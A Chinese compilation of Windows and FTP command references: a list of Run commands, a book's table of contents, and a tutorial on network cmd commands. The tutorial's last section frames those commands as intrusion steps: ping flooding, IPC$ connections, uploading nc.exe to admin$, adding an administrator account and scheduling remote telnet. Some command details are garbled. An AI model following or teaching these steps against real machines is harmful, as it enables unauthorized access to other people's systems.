53.rename[from][to]：更改远程主机文件名。
54.reset：清除回答队列。

55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。
56.rmdir dir-name：删除远程主机目录。

57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。
58.send local-file[remote-file]：同put。

59.sendport：设置PORT命令的使用。
60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。

61.size file-name：显示远程主机文件大小，如：site idle 7200。
62.status：显示当前ftp状态。

63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。
64.sunique：将远程主机文件名存储设置为只一(与runique对应)。

65.system：显示远程主机的操作系统类型。
66.tenex：将文件传输类型设置为TENEX机的所需的类型。

67.tick：设置传输时的字节计数器。
68.trace：设置包跟踪。

69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。
70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3

71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。
72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.

73.?[cmd]：同help.

#11 十一：

7：计算机运行命令全集 winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
winver---------检查Windows版本
wmimgmt.msc----打开windows管理体系结构
wupdmgr--------windows更新程序
wscript--------windows脚本宿主设置
write----------写字板winmsd-----系统信息
wiaacmgr-------扫描仪和照相机向导
winchat--------XP自带局域网聊天
mem.exe--------显示内存使用情况
Msconfig.exe---系统配置实用程序
mplayer2-------简易widnows media player
mspaint--------画图板
mstsc----------远程桌面连接
mplayer2-------媒体播放机
magnify--------放大镜实用程序
mmc------------打开控制台
mobsync--------同步命令
dxdiag---------检查DirectX信息
drwtsn32------ 系统医生
devmgmt.msc--- 设备管理器
dfrg.msc-------磁盘碎片整理程序
diskmgmt.msc---磁盘管理实用程序
dcomcnfg-------打开系统组件服务
ddeshare-------打开DDE共享设置
dvdplay--------DVD播放器
net stop messenger-----停止信使服务
net start messenger----开始信使服务
notepad--------打开记事本
nslookup-------网络管理的工具向导
ntbackup-------系统备份和还原
narrator-------屏幕"讲述人"
ntmsmgr.msc----移动存储管理器
ntmsoprq.msc---移动存储管理员操作请求
netstat -an----(TC)命令检查接口
syncapp--------创建一个公文包
sysedit--------系统配置编辑器
sigverif-------文件签名验证程序
sndrec32-------录音机
shrpubw--------创建共享文件夹
secpol.msc-----本地安全策略
syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码
services.msc---本地服务设置
Sndvol32-------音量控制程序
sfc.exe--------系统文件检查器
sfc /scannow---windows文件保护
tsshutdn-------60秒倒计时关机命令
tourstart------xp简介（安装完成后出现的漫游xp程序）
taskmgr--------任务管理器
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打开资源管理器
packager-------对象包装程序
perfmon.msc----计算机性能监测程序
progman--------程序管理器
regedit.exe----注册表
rsop.msc-------组策略结果集
regedt32-------注册表编辑器
rononce -p ----15秒关机
regsvr32 /u *.dll----停止dll文件运行
regsvr32 /u zipfldr.dll------取消ZIP支持
cmd.exe--------CMD命令提示符
chkdsk.exe-----Chkdsk磁盘检查
certmgr.msc----证书管理实用程序
calc-----------启动计算器
charmap--------启动字符映射表
cliconfg-------SQL SERVER 客户端网络实用程序
Clipbrd--------剪贴板查看器
conf-----------启动netmeeting
compmgmt.msc---计算机管理
cleanmgr-------**整理
ciadv.msc------索引服务程序
osk------------打开屏幕键盘
odbcad32-------ODBC数据源管理器
oobe/msoobe /a----检查XP是否激活
lusrmgr.msc----本机用户和组
logoff---------注销命令
iexpress-------木马捆绑工具，系统自带
Nslookup-------IP地址侦测器
fsmgmt.msc-----共享文件夹管理器
utilman--------辅助工具管理器
gpedit.msc-----组策略

D. windows 命令行管理服务

windows 命令行管理服务可使用net和sc两个命令.

net用于打开没有被禁用的服务,它包含了管理网络环境、服务、用户、登陆大部分重要的管理功能

可打开被禁用的服务。(也可以查看服务状态)可以创建服务、删除服务、打开与关闭服务
sc是用于与服务控制管理器和服务进行通信的命令行程序，其语法是：

E. WIN10系统有哪些运行命令

regedit 注册表运行命令
cmd打开DOS窗口
SnippingTool 打开截图工具
calc.exe打开计算器
shutdown -s -t 3600 定时关机，参数有间有空格，-t 后为关机倒计时秒数 shutdown -a 如果中途想取消定时关机
cleanmgr 打开系统自带磁盘清理器
msconfig 管理启动项
control 打开控制面板
mspaint 画图
write 写字板
Notepad 新建一个记事本
slmgr.vbs -xpr 查看系统是否永久激活详细信息
Compmgmtlauncher 打开计算管理
control 打开控制面板
explorer打开资源管理器
mrt Microsoft Windows 恶意软件删除工具
Notepad 新建一个记事本
taskmgr 任务管理器
dxdiag查看电脑显卡信息
gpedit.msc 组策略命令,打开本地组策略编辑器，可以更改配置
远程桌面连接 mstsc
这些是网上手机的比较全的快捷命令：
命令 命令功能
appwiz.cpl 卸载或更改程序
azman（Win7） 授权管理器
calc 计算器
certmgr（Win7） 证书
charmap 字符映射表
cleanmgr 磁盘清理
cliconfg SQL Server 客户端网络实用工具
cmd 命令提示符
colorcpl 颜色管理
comexp（Win7） 组件服务
compmgmt 计算机管理
compmgmtlauncher 计算机管理
computerdefaults 设置程序访问此计算机的默认值
control 控制面板
credwiz 存储的用户名和密码
cttune ClearType文本调谐器
dccw 显示颜色校准
dcomcnfg 组件服务
desk.cpl 屏幕分辨率
devicepairingwizard 添加设备
devmgmt.msc 设备管理器
dfrgui 优化驱动器
dialer 电话括号程序
diskmgmt.msc 磁盘管理
displayswitch 显示切换
dpapimig 受保护的内容迁移
dpiscaling 显示
dxdiag DirectX 诊断工具
eudcedit 专用字符编辑程序
eventvwr 事件查看器
explorer Windows 资源管理器
firewall.cpl Windows 防火墙
fsmgmt.msc 共享文件夹
fsquirt Bluetooth文件传送
fxscover 传真封面编辑器
gettingstarted（Win7） Windows 入门
gpedit.msc 本地组策略编辑器
hdwwiz 添加硬件
iexpress IExpress 向导
iscsicpl Microsoft iSCSI
isoburn Windows 光盘映像刻录机
journal Windows 日记本
locationnotifications（Win7） 默认位置
lpksetup 安装或卸载显示语言
lusrmgr.msc 本地用户和组
magnify 放大镜
main.cpl 鼠标属性
mblctr Windows 移动中心
mdsched Windows 内存诊断
mip 数学输入面板
mmc MMC管理控制台
mobsync 同步中心
mrt Microsoft Windows 恶意软件删除工具
msconfig 系统配置
msdt Microsoft 支持诊断工具
msinfo32 系统信息
mspaint 画图
msra Windows 远程协助
mstsc 远程桌面连接
napclcfg（Win7） NAP 客户端配置
narrator 讲述人设置
ncpa.cpl 网络连接
netplwiz 用户账户
netproj（Win7） 连接到网络投影仪
notepad 记事本
nslookup IP地址侦测器
odbcad32 ODBC 数据源管理程序
optionalfeatures Windows 功能
osk 屏幕键盘
perfmon 性能监视器
powercfg.cpl 电源选项
powershell Windows Powershell
powershell_ise Windows PowerShell ISE
presentationsettings 演示设置
printbrmui 打印机迁移
printmanagement.msc 打印管理
printui 打印机用户界面
psr 步骤记录器
recdisc 创建系统修复光盘
regedit 注册表编辑器
rekeywiz 加密文件系统
resmon 资源监视器
rsop 组策略结果集
rstrui 系统还原
sdclt 备份和还原
secpol.msc 本地安全策略
services.msc 服务
shrpubw 创建共享文件夹向导
sigverif 文件签名验证
slui Windows 激活
sndvol 音量合成器
snippingtool 截图工具
soundrecorder（Win7） 录音机
stikynot 便签
sysdm.cpl 系统属性
syskey 保护 Windows 账户数据库的安全
systempropertiesadvanced 系统属性-高级
systempropertiescomputername 系统属性-计算机名
数据执行保护
systempropertieshardware 系统属性-硬件
systempropertiesperformance 性能选项
systempropertiesprotection 系统属性-系统保护
systempropertiesremote 系统属性-远程
tabcal 数字化校准工具
taskmgr 任务管理器
taskschd.msc 任务计划程序
tpm.msc 受信任的平台(TPM)管理
useraccountcontrolsettings 用户账户控制设置
utilman 轻松使用设置中心
verifier 驱动程序验证程序管理器
wab 联系人
wabmig 导入 Windows 联系人
wbemtest WMI 测试器
wf.msc 高级安全 Windows 防火墙
wfs Windows 传真和扫描
wiaacmgr 扫描仪
winhlp32 Windows 帮助和支持
winver 关于Windows
wmimgmt.msc WMI 管理
wmplayer Windows Media Player
write 写字板
wscript Windows 脚本宿主设置
wscui.cpl 安全性与维护
wuapp（Win7） Windows Update
wusa Windows 更新独立安装程序
xpsrchvw XPS 查看器

F. Windows 命令行详解手册：第2版的目录

第一部分windows命令行基础.
第1章windows命令行概述 2
1.1命令行基础 2
1.1.1理解windows命令shell 2
1.1.2理解ms-dos命令shell 5
1.1.3理解windows powershell 6
1.1.4配置命令行属性 8
1.1.5使用命令历史 9
1.2使用补充的组件 10
1.2.1在windows vista中使用微软远程服务器管理工具 10
1.2.2注册远程服务器管理工具包 10
1.2.3配置与选择远程服务器管理工具 11
1.2.4删除远程服务器管理工具 11
1.2.5删除远程服务器管理工具软件包 12
第2章充分利用命令行 13
2.1管理命令shell的启动方式 13
2.2使用命令路径进行工作 15
2.2.1管理命令路径 15
2.2.2管理文件扩展与文件关联 16
2.3标准输入、输出及错误日志的重定向 17
.2.3.1将标准输出重定向到其他命令 17
2.3.2i/o与文件的重定向 18
2.3.3标准错误输出的重定向 18
2.4命令的结链与分组 19
2.4.1使用命令链 19
2.4.2命令分组 20
第3章命令行脚本基础 21
3.1创建命令行脚本 21
3.2脚本的常见语句与命令 22
3.2.1清除命令shell窗口 23
3.2.2为脚本添加注释 23
3.2.3管理文字的显示方式与命令回显方式 24
3.2.4使用@对命令回显进行调整 25
3.2.5设置控制台窗口的标题与颜色 25
3.3向脚本传递参数 26
3.4熟悉变量 27
3.5在脚本中使用变量 28
3.5.1变量命名 28
3.5.2设置变量值 29
3.5.3替换变量值 30
3.5.4变量作用范围局部化 31
3.6使用数学表达式 32
3.6.1使用算术运算符与赋值运算符 32
3.6.2理解运算符的优先级 33
3.6.3模拟指数操作 33
3.7命令行选择语句 34
3.7.1使用if语句 34
3.7.2使用if not语句 35
3.7.3使用if defined与if not defined语句 35
3.7.4使用嵌套的 if 语句 35
3.7.5在 if 语句中进行比较 36
3.8命令行迭代语句 36
3.8.1迭代的基础 36
3.8.2遍历一系列值 37
3.8.3在成组的文件中迭代执行 38
3.8.4在目录中迭代执行 38
3.8.5分析文件的内容与输出 40
3.9创建子程序与过程 41
3.9.1使用子程序 42
3.9.2使用过程 43
第二部分使用命令行管理windows系统
第4章部署windows服务器 46
4.1服务器配置管理 46
4.2使用角色、角色服务与功能 47
4.3管理角色、角色服务与功能 51
4.3.1servermanagercmd基础 51
4.3.2查询已安装的角色、角色服务与功能 56
4.3.3安装角色、角色服务与功能 57
4.3.4移除角色、角色服务与功能 58
第5章管理windows系统 59
5.1检查系统信息 59
5.2操作注册表 61
5.2.1理解注册表与键值 61
5.2.2查询注册表值 63
5.2.3比较注册表值 63
5.2.4注册表键的保存与恢复 64
5.2.5添加注册表键 65
5.2.6复制注册表键 65
5.2.7删除注册表键 66
5.2.8导入与导出注册表键 66
5.2.9加载与卸载注册表键 67
5.3管理系统服务 69
5.3.1查看已配置的服务 69
5.3.2启动、终止与暂停服务 71
5.3.3配置服务的启动方式 72
5.3.4配置服务的登录方式 72
5.3.5配置服务的恢复方式 73
5.4从命令行重启与关闭系统 75
5.4.1管理本地系统的重启与关闭 76
5.4.2管理远程系统的重启与关闭 76
5.4.3添加关机或重启原因与注释 77
第6章事件记录、追踪与监控 79
6.1windows事件日志 79
6.2查看与过滤事件日志 82
6.2.1查看事件 82
6.2.2过滤事件 83
6.3向事件日志中写入自定义事件 85
6.4创建与使用保存的查询 86
6.5性能监控：基础 89
6.5.1理解如何在命令行中进行性能监控 89
6.5.2追踪性能数据 90
第7章进程监控与性能维护 94
7.1管理应用程序、进程与性能 94
7.1.1理解系统与用户进程.. 94
7.1.2检查运行中进程 95
7.1.3监控系统资源使用情况与进程 101
7.1.4终止进程 106
7.2通过监控来检测与解决性能问题 108
7.2.1监控内存分页与磁盘页面 108
7.2.2监控单个进程的内存使用与working memory set 109
7.2.3解决性能瓶颈 111
第8章管理事件与性能日志 114
8.1管理事件日志 114
8.1.1开始使用wevtutil 114
8.1.2列出可用的日志与已注册的事件发布者 115
8.1.3查看与改变日志配置 117
8.1.4导出与操作事件日志 119
8.1.5清除事件日志 122
8.2企业级集中化事件记录机制 122
8.2.1配置事件转发与收集 123
8.2.2创建订阅 124
8.2.3管理订阅 128
8.3性能日志 130
8.3.1开始使用数据收集器集 130
8.3.2操作数据收集器集 131
8.3.3收集性能计数器数据 133
8.3.4配置性能计数器警报 136
8.3.5查看数据收集器报告 139
第9章计划任务的自动运行 141
9.1在本地与远程系统上执行计划任务 141
9.1.1计划任务简介 141
9.1.2监控计划任务 145
9.2使用任务计划程序计划任务 146
9.2.1创建基本任务 146
9.2.2创建高级任务 148
9.2.3管理任务属性 150
9.2.4激活与禁用任务 150
9.2.5将任务复制到其他计算机 150
9.2.6立即运行任务 150
9.2.7移除不需要的任务 150
9.3使用schtasks设置任务计划 151
9.3.1使用schtasks/create创建计划任务 151
9.3.2创建由windows事件触发的计划任务 156
9.3.3使用schtasks /change改变计划任务 157
9.3.4使用schtasks/query查询已配置的任务 159
9.3.5使用xml配置文件创建任务 159
9.3.6使用schtasks /run立即运行任务 163
9.3.7使用schtasks /end终止运行中的任务 163
9.3.8使用schtasks/delete删除任务 164
第三部分使用命令行管理windows文件系统和磁盘
第10章配置与维护磁盘 166
10.1使用diskpart 166
10.1.1diskpart基础 166
10.1.2diskpart：一个实例 167
10.1.3理解焦点及其内涵 167
10.1.4diskpart命令与脚本 167
10.1.5diskpart：脚本实例 170
10.2安装与管理硬盘驱动器 172
10.2.1安装与检查新驱动器 172
10.2.2检查驱动器状态与配置 173
10.2.3修改驱动器分区风格 174
10.3操作基本磁盘与动态磁盘 175
10.3.1理解基本磁盘与动态磁盘 176
10.3.2设置活动分区 177
10.3.3改变磁盘类型：基本磁盘与动态磁盘的互相转换 177
10.4磁盘维护 178
10.4.1使用fsutil获取磁盘信息并管理文件系统 178
10.4.2检查磁盘的错误与坏扇区 180
10.4.3修正磁盘错误 183
10.4.4对系统启动时的自动检测进行控制 184
10.5磁盘碎片整理 185
第11章对基本磁盘进行分区 188
11.1获取分区信息 188
11.2创建分区 189
11.2.1在mbr磁盘上创建分区 189
11.2.2在gpt磁盘上创建分区 190
11.3管理盘符与挂载点 192
11.3.1分配驱动器盘符或挂载点 192
11.3.2改变驱动器盘符或挂载点 193
11.3.3移除盘符或挂载点 193
11.4格式化分区 194
11.4.1使用format 194
11.4.2使用filesystems 195
11.4.3格式化：一个实例 197
11.5管理分区 198
11.5.1将分区或卷转换为ntfs 198
11.5.2改变或删除卷标 200
11.5.3压缩分区或卷 200
11.5.4扩展分区或卷 201
11.5.5删除分区 202
第12章管理动态磁盘上的卷与raid 203
12.1获取卷信息与状态 203
12.2创建并管理简单卷 205
12.2.1创建简单卷 205
12.2.2扩展简单卷 206
12.2.3将动态磁盘联机 206
12.2.4删除卷 207
12.3通过动态磁盘上的raid提供容错功能 207
12.3.1实现raid-0：磁盘分割 208
12.3.2实现raid-1：磁盘镜像与双控 209
12.3.3实现raid-5：带奇偶校验的磁盘分割 210
12.4管理raid并从失效中恢复 212
12.4.1分离镜像集 212
12.4.2重新同步与修复镜像集 212
12.4.3修复不带奇偶校验信息的raid-0条带集 213
12.4.4重建带奇偶校验信息的raid-5条带集 213
第四部分使用命令行管理windows活动目录
第13章核心目录服务管理 216
13.1从命令行控制活动目录 216
13.1.1理解域、容器与对象 216
13.1.2理解活动目录中的逻辑结构与物理结构 217
13.1.3理解区分名 218
13.1.4使用活动目录命令行工具 218
13.2使用dsquery命令进行目录查询 219
13.2.1dsquery子命令及语法 220
13.2.2使用名称、描述、sam账号名进行搜索 221
13.2.3设定搜索的登录域与run as许可权限 222
13.2.4设定开始节点、搜索范围与对象限制 223
13.2.5设定名的输出格式 225
13.2.6结合使用dsquery与其他活动目录命令行工具 226
13.3搜索问题用户与计算机账号 226
13.4对象的重命名与移动 227
13.5从活动目录中移除对象 228
第14章管理计算机账号与域控制器 229
14.1从命令行管理计算机账号概览 229
14.2在活动目录域内创建计算机账号 230
14.2.1创建计算机账号 230
14.2.2定制计算机账号属性与组成员关系 231
14.3管理计算机账号属性 232
14.3.1查看与寻找计算机账号 232
14.3.2设置或修改计算机的位置与描述信息属性 234
14.3.3禁用与激活计算机账号 234
14.3.4重置锁定的计算机账号 235
14.3.5将计算机账号添加到某域中 236
14.3.6对计算机与计算机账号进行重命名 237
14.3.7移动计算机账号 238
14.3.8删除计算机账号 238
14.4操作域控制器 239
14.4.1安装与降级域控制器 239
14.4.2在活动目录中发现域控制器 239
14.5指定全局编目服务器 240
14.5.1发现全局编目服务器 240
14.5.2添加或移除全局编目服务器 241
14.5.3检查缓存与优先的全局编目设置 241
14.6指定操作主机 242
14.6.1发现操作主机 243
14.6.2使用命令行配置操作主机角色 244
14.7发现只读的域控制器 246
第15章管理活动目录用户与组 247
15.1从命令行中管理用户账号概览 247
15.2添加用户账号 249
15.2.1创建域用户账号 249
15.2.2自定义域用户账号属性与组成员关系 250
15.2.3创建本地用户账号 252
15.3管理用户账号 253
15.3.1查看与查找用户账号 253
15.3.2确定单独用户账号的组成员关系 254
15.3.3设置或更改用户账号属性 255
15.3.4禁用与激活用户账号 256
15.3.5重置过期的用户账号 256
15.3.6控制与重置用户口令 257
15.3.7移动用户账号 258
15.3.8用户账号重命名 258
15.3.9删除用户账号 259
15.4从命令行管理组账号概览 259
15.5添加组账号 260
15.5.1创建安全组与分发组 261
15.5.2创建本地组并为其分配成员 262
15.6管理组账号 263
15.6.1查看与寻找组账号 263
15.6.2确定组成员关系 264
15.6.3改变组类型或范围 265
15.6.4添加、移除或替换组成员 265
15.6.5移动组账号 267
15.6.6组账号重命名 267
15.6.7删除组账号 268
第五部分使用命令行管理网络
第16章管理网络打印机与打印服务 270
16.1获取打印机的支持信息与故障排除信息 270
16.1.1在命令行中操作打印机 270
16.1.2追踪打印驱动程序与打印机信息 271
16.1.3获取用于容量规划与故障排除的打印详细统计资料 274
16.2管理打印机 278
16.2.1安装物理连接的打印设备 279
16.2.2安装网络连接的打印设备 280
16.2.3列出计算机上配置的打印机 280
16.2.4查看与设置默认打印机 281
16.2.5打印机重命名 281
16.2.6删除打印机 282
16.3管理网络连接打印机的tcp/ip端口 282
16.3.1为打印机创建与改变tcp/ip端口 282
16.3.2列出打印机使用的tcp/ip端口相关的信息 283
16.3.3删除打印机使用的tcp/ip端口 284
16.4配置打印机属性 284
16.4.1添加注释与位置信息 285
16.4.2共享打印机 285
16.4.3在活动目录中发布打印机 285
16.4.4设置分隔页并改变打印设备模式 286
16.4.5打印任务的调度与优先级设置 286
16.4.6配置缓冲池与其他高级打印机选项 287
16.5解决缓存问题 288
16.5.1检查print spooler服务 288
16.5.2修复损坏的缓冲池 289
16.6管理打印队列与单个打印任务 289
16.6.1查看队列中的任务 289
16.6.2打印机的暂停与恢复 290
16.6.3清空打印队列 290
16.6.4暂停、恢复与重启单个文档的打印 291
16.6.5移除文档并取消打印任务 291
16.7备份与恢复打印服务器配置 292
16.7.1备份打印服务器的配置 292
16.7.2恢复打印服务器的配置 293
16.7.3迁移打印机与打印队列 294
第17章tcp/ip网络的配置、管理与故障排除 295
17.1使用网络服务shell 295
17.1.1操作netsh上下文 295
17.1.2操作远程计算机 297
17.1.3操作脚本文件 298
17.2管理tcp/ip设置 299
17.2.1配置ipv4 299
17.2.2配置ipv6 304
17.3支持tcp/ip网络 307
17.3.1获取并保存tcp/ip设置 307
17.3.2检查ip地址与网络接口配置 309
17.3.3操作tcp internet控制与错误消息 310
17.3.4检查分片、重组、错误消息的详细信息 312
17.3.5检查当前的tcp与udp连接 313
17.4排除tcp/ip网络故障 317
17.4.1查看诊断信息 317
17.4.2诊断常规的计算机配置问题 318
附录a基本命令行工具参考 330
附录bnetsh快速参考... 367

G. windows xp的常用命令有什么，

必须掌握的八个cmd命令
一、ping
它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在DOS窗口中键入：ping /? 回车。所示的帮助画面。在此，我们只掌握一些基本的很有用的参数就可以了（下同）。
-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标IP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。
-l 定义发送数据包的大小，默认为32字节，我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用，会有更好的效果哦。
-n 定义向目标IP发送数据包的次数，默认为3次。如果网络速度比较慢，3次对我们来说也浪费了不少时间，因为现在我们的目的仅仅是判断目标IP是否存在，那么就定义为一次吧。
说明一下，如果-t 参数和 -n参数一起使用，ping命令就以放在后面的参数为标准，比如"ping IP -t -n 3"，虽然使用了-t参数，但并不是一直ping下去，而是只ping 3次。另外，ping命令不一定非得ping IP，也可以直接ping主机域名，这样就可以得到主机的 IP。
下面我们举个例子来说明一下具体用法。
这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒，从这里可以判断网络连接速度的大小。从TTL的返回值可以初步判断被 ping主机的操作系统，之所以说"初步判断"是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。
（小知识：如果TTL=128，则表示目标主机可能是Win2000；如果TTL=250，则目标主机可能是Unix）
至于利用ping命令可以快速查找局域网故障，可以快速搜索最快的QQ服务器，可以对别人进行ping攻击……这些就靠大家自己发挥了。
二、nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。
-a 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息（下同）。
-A 这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。
-n 列出本地机器的NETBIOS信息。
当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。
三、netstat
这是一个用来查看网络状态的命令，操作简便功能强大。
-a 查看本地机器的所有开放端口，可以有效发现和预防木马，可以知道机器所开的服务等信息。
这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法：netstat -a IP。
-r 列出当前的路由信息，告诉我们本地机器的网关、子网掩码等信息。用法：netstat -r IP。
四、tracert
跟踪路由信息，使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径，这对我们了解网络布局和结构很有帮助。
这里说明数据从本地机器传输到192.168.0.1的机器上，中间没有经过任何中转，说明这两台机器是在同一段局域网内。用法：tracert IP。
五、net
这个命令是网络命令中最重要的一个，必须透彻掌握它的每一个子命令的用法，因为它的功能实在是太强大了，这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令，键入net /?回车。
在这里，我们重点掌握几个入侵常用的子命令。
net view
使用此命令查看远程主机的所以共享资源。命令格式为net view IP。
net use
把远程主机的某个共享资源影射为本地盘符，图形界面方便使用，呵呵。命令格式为net use x: IPsharename。上面一个表示把 192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接（net use IP IPC$"password" /user:"name"）。
建立了IPC$连接后，呵呵，就可以上传文件了： nc.exe 92.168.0.7admin$，表示把本地目录下的nc.exe传到远程主机，结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后，如果发现它的什么服务没有启动，而你又想利用此服务怎么办？就使用这个命令来启动吧。用法：net start servername，成功启动了telnet服务。
net stop
入侵后发现远程主机的某个服务碍手碍脚，怎么办？利用这个命令停掉就ok了，用法和net start同。
net user
查看和帐户有关的情况，包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的，最重要的，它为我们克隆帐户提供了前提。键入不带参数的net user，可以查看所有用户，包括已经禁用的。下面分别讲解。
1，net user abcd 1234 /add，新建一个用户名为abcd，密码为1234的帐户，默认为user组成员。
2，net user abcd /del，将用户名为abcd的用户删除。
3，net user abcd /active:no，将用户名为abcd的用户禁用。
4，net user abcd /active:yes，激活用户名为abcd的用户。
5，net user abcd，查看用户名为abcd的用户的情况。
net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中，我们一般利用它来把某个帐户提升为administrator组帐户，这样我们利用这个帐户就可以控制整个远程主机了。用法： net localgroup groupname username /add。
现在我们把刚才新建的用户abcd加到administrator组里去了，这时候abcd用户已经是超级管理员了，呵呵，你可以再使用 net user abcd来查看他的状态。但这样太明显了，网管一看用户情况就能漏出破绽，所以这种方法只能对付菜鸟网管，但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员，这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。
net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面，那么也许就用不到这个命令了。但简单的入侵成功了，难道只是看看吗？我们需要进一步渗透。这就连远程主机当前的时间都需要知道，因为利用时间和其他手段（后面会讲到）可以实现某个命令和程序的定时启动，为我们进一步入侵打好基础。用法：net time IP。
六、at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序（知道net time的重要了吧？）。当我们知道了远程主机的当前时间，就可以利用此命令让其在以后的某个时间（比如2分钟后）执行某个程序和命令。用法：at time command computer。
表示在6点55分时，让名称为a-01的计算机开启telnet服务（这里net start telnet即为开启telnet服务的命令）。
七、ftp
大家对这个命令应该比较熟悉了吧？网络上开放的ftp的主机很多，其中很大一部分是匿名的，也就是说任何人都可以登陆上去。现在如果你扫到了一台开放 ftp服务的主机（一般都是开了21端口的机器），如果你还不会使用ftp的命令怎么办？下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车，出现ftp的提示符，这时候可以键入"help"来查看帮助（任何DOS命令都可以使用此方法查看其帮助)。
大家可能看到了，这么多命令该怎么用？其实也用不到那么多，掌握几个基本的就够了。
首先是登陆过程，这就要用到open了，直接在ftp的提示符下输入"open 主机IP ftp端口"回车即可，一般端口默认都是21，可以不写。接着就是输入合法的用户名和密码进行登陆了，这里以匿名ftp为例介绍。
用户名和密码都是ftp，密码是不显示的。当提示**** logged in时，就说明登陆成功。这里因为是匿名登陆，所以用户显示为Anonymous。
接下来就要介绍具体命令的使用方法了。
dir 跟DOS命令一样，用于查看服务器的文件，直接敲上dir回车，就可以看到此ftp服务器上的文件。
cd 进入某个文件夹。
get 下载文件到本地机器。
put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了，如果可以，呵呵，该怎么利用就不多说了，大家就自由发挥去吧。
delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。
bye 退出当前连接。
quit 同上。
八、telnet
功能强大的远程登陆命令，几乎所有的入侵者都喜欢用它，屡试不爽。为什么？它操作简单，如同使用自己的机器一样，只要你熟悉DOS命令，在成功以 administrator身份连接了远程机器后，就可以用它来干你想干的一切了。下面介绍一下使用方法，首先键入telnet回车，再键入help查看其帮助信息。
然后在提示符下键入open IP回车，这时就出现了登陆窗口，让你输入合法的用户名和密码，这里输入任何密码都是不显示的。
当输入用户名和密码都正确后就成功建立了telnet连接，这时候你就在远程主机上具有了和此用户一样的权限，利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的。
到这里为止，网络DOS命令的介绍就告一段落了，这里介绍的目的只是给菜鸟网管一个印象，让其知道熟悉和掌握网络DOS命令的重要性。其实和网络有关的DOS命令还远不止这些，这里只是抛砖引玉，希望能对广大菜鸟网管有所帮助。学好DOS对当好网管有很大的帮助，特别的熟练掌握了一些网络的DOS命令。
另外大家应该清楚，任何人要想进入系统，必须得有一个合法的用户名和密码（输入法漏洞差不多绝迹了吧），哪怕你拿到帐户的只有一个很小的权限，你也可以利用它来达到最后的目的。所以坚决消灭空口令，给自己的帐户加上一个强壮的密码，是最好的防御弱口令入侵的方法。
最后，由衷的说一句，培养良好的安全意识才是最重要的。